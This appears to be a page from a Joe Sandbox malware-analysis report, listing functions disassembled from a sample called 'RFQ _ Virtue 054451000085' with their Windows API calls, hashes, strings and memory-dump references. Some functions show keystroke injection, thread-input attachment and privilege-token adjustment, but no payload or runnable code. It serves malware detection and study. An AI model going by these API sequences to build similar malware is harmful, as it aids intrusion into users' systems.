Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E

Function 0040784B Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407899

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
Instruction ID: 03ec0e1ddcc1c42b0f32453fdad85b9eaadac3e2e088d633c8de65ee5d072679
Opcode Fuzzy Hash: f7e62a8e1c5e2c2480a96847b068e2bf3622822eade55fefb08bb6a489eda471
Instruction Fuzzy Hash: 4111D532A04215ABD714EF28D485C6AB7A9EF85324724812FE905DB3D1DB35FC01C799

Function 00404DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF

Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F

Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4

Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99

Function 0043FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0043FD91

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1d552beb7b604a3469ce90b415d42699b56cfd27380834e93100c85a5b232174
Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
Opcode Fuzzy Hash: 1d552beb7b604a3469ce90b415d42699b56cfd27380834e93100c85a5b232174
Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B

Function 00B76086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00B7608C

Memory Dump Source

Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 978d2fec6b7866ee20f8d72aaf39741cc29443217321bcd9332a93acee2defed
Instruction ID: aa46907df652eae10760f067dc0fd3ce9c96de3746f3f1900f44b7bc243beff3
Opcode Fuzzy Hash: 978d2fec6b7866ee20f8d72aaf39741cc29443217321bcd9332a93acee2defed
Instruction Fuzzy Hash: CA01967180DB409FCB398B2484487357BF4EF56350F49DADAE1BDAB1A2D6708D04CB52

Function 00424863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 004248A6

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction ID: a5fe8b5ebddeabdc03b7defa85b5706b3c04092d14be9d7edba4dc341e0ab760
Opcode Fuzzy Hash: 067e945b42619cd5e532bb4c940c68e511b21f2bac583ba92795690b8c8a8ee6
Instruction Fuzzy Hash: B4F0F431B11224EBDF11BFB2AC053AE36A0EF41328F91440EF42096281DB7C8951DB5D

Function 00404E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction ID: e65952a518aebd30c2be6c87fe4ab6250acd6cacf129c027b051fb699af34d37
Opcode Fuzzy Hash: 5e403c8a90df1ee0e06371f2d57000cd02bd76b5d635224a6d232ab0319aed21
Instruction Fuzzy Hash: 85F01CB1501711CFCB349F64E494817B7E1BF94369320893FE2D692650C7359844DB84

Function 00420791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction ID: 9246c12fdc37fcd41ca4db90d4c6e7f6585ba1f285f6c4ea688713946de2f6cd
Opcode Fuzzy Hash: 5311bc10bcd02c3da6376a961da6fa5eeea3c1e89524b7fc1d9ecfef85fbf38f
Instruction Fuzzy Hash: F5E0263290012817C720E2599C05FEA77ACDF882A0F0401BAFC0CD3204D964AC808694

Function 0042525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00425266

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 26467e9723955137fe9c45439b6ceb4f873de5a2d7ef111d81715968119f48b2
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 99B0927654020CB7CE012A82FC02A593B199B41768F8080A1FB0C181A2A677A6649A99

Function 00E8061C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00E80631

Memory Dump Source

Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: a6e47c53580487e074d5610b5f303d1b03cce7a805c3a898dd4c094b101d2a2f
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 1FE0BF7494010DEFDB40EFA4D6496DE7BB4EF04311F1005A1FD05E7680DB309E649A66

Function 00E80620 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00E80631

Memory Dump Source

Source File: 00000000.00000002.1541781702.0000000000E7E000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E7E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e7e000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 06f489253fa8036f56e4051a6c115566f3771f880290945e777a698f0ffe089a
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 10E0E67494010DDFDB40EFB4D64969E7FB4EF04311F100161FD05E2280D6309D609A62

Non-executed Functions

Function 0048CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
SendMessageW.USER32 ref: 0048CC29
_wcsncpy.LIBCMT ref: 0048CC95
GetKeyState.USER32(00000011), ref: 0048CCB6
GetKeyState.USER32(00000009), ref: 0048CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
GetKeyState.USER32(00000010), ref: 0048CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
SendMessageW.USER32 ref: 0048CD33
SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
SetCapture.USER32(?), ref: 0048CE69
ClientToScreen.USER32(?,?), ref: 0048CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
ReleaseCapture.USER32 ref: 0048CF00
GetCursorPos.USER32(?), ref: 0048CF3A
ScreenToClient.USER32(?,?), ref: 0048CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
SendMessageW.USER32 ref: 0048CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
SendMessageW.USER32 ref: 0048D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
GetCursorPos.USER32(?), ref: 0048D08D
ScreenToClient.USER32(?,?), ref: 0048D09A
GetParent.USER32(?), ref: 0048D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
SendMessageW.USER32 ref: 0048D154
ClientToScreen.USER32(?,?), ref: 0048D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
SendMessageW.USER32 ref: 0048D22F
ClientToScreen.USER32(?,?), ref: 0048D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetWindowLongW.USER32(?,000000F0), ref: 0048D351

Strings

%, xrefs: 0048CEAF
F, xrefs: 0048D235
@GUI_DRAGID, xrefs: 0048CE9C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: %$@GUI_DRAGID$F
API String ID: 3977979337-880513241
Opcode ID: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
Opcode Fuzzy Hash: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A

Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004171C3
_memset.LIBCMT ref: 00417539
_memmove.LIBCMT ref: 004176AC

Strings

]K, xrefs: 00451A22
P\K, xrefs: 00451AB8
Q\E, xrefs: 00417FCB
[:>:]], xrefs: 00417492
\b(?=\w), xrefs: 00453769
\b(?<=\w), xrefs: 00453773
3cA, xrefs: 004523A0
[:<:]], xrefs: 00417479
DEFINE, xrefs: 00452103
_A, xrefs: 004523CB

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
API String ID: 1357608183-1426331590
Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48

Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 004048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
IsIconic.USER32(?), ref: 0043D66E
ShowWindow.USER32(?,00000009), ref: 0043D67B
SetForegroundWindow.USER32(?), ref: 0043D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
GetCurrentThreadId.KERNEL32 ref: 0043D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
SetForegroundWindow.USER32(?), ref: 0043D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
keybd_event.USER32(00000012,00000000), ref: 0043D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
keybd_event.USER32(00000012,00000000), ref: 0043D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
keybd_event.USER32(00000012,00000000), ref: 0043D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
keybd_event.USER32(00000012,00000000), ref: 0043D71E
SetForegroundWindow.USER32(?), ref: 0043D721
AttachThreadInput.USER32(?,?,00000000), ref: 0043D748

Strings

Shell_TrayWnd, xrefs: 0043D660

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9

Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865

_memset.LIBCMT ref: 00458353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
CloseHandle.KERNEL32(?), ref: 004583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
GetProcessWindowStation.USER32 ref: 004583E6
SetProcessWindowStation.USER32(00000000), ref: 004583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A

Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Strings

winsta0, xrefs: 004583C8
, xrefs: 00458362
default, xrefs: 00458405

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 7be1ac5be2e4501a0d8ea70d1a0710a767c1e66cdcb6221c91b9d2c38c59048b
Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
Opcode Fuzzy Hash: 7be1ac5be2e4501a0d8ea70d1a0710a767c1e66cdcb6221c91b9d2c38c59048b
Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28

Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
FindClose.KERNEL32(00000000), ref: 0046C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
__swprintf.LIBCMT ref: 0046C890
__swprintf.LIBCMT ref: 0046C8D3

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

__swprintf.LIBCMT ref: 0046C927

Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1

__swprintf.LIBCMT ref: 0046C975

Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B

__swprintf.LIBCMT ref: 0046C9C4
__swprintf.LIBCMT ref: 0046CA13
__swprintf.LIBCMT ref: 0046CA62

Strings

%02d, xrefs: 0046C91B, 0046C925, 0046C973, 0046C9C2, 0046CA11, 0046CA60
%4d, xrefs: 0046C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 0046C88A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
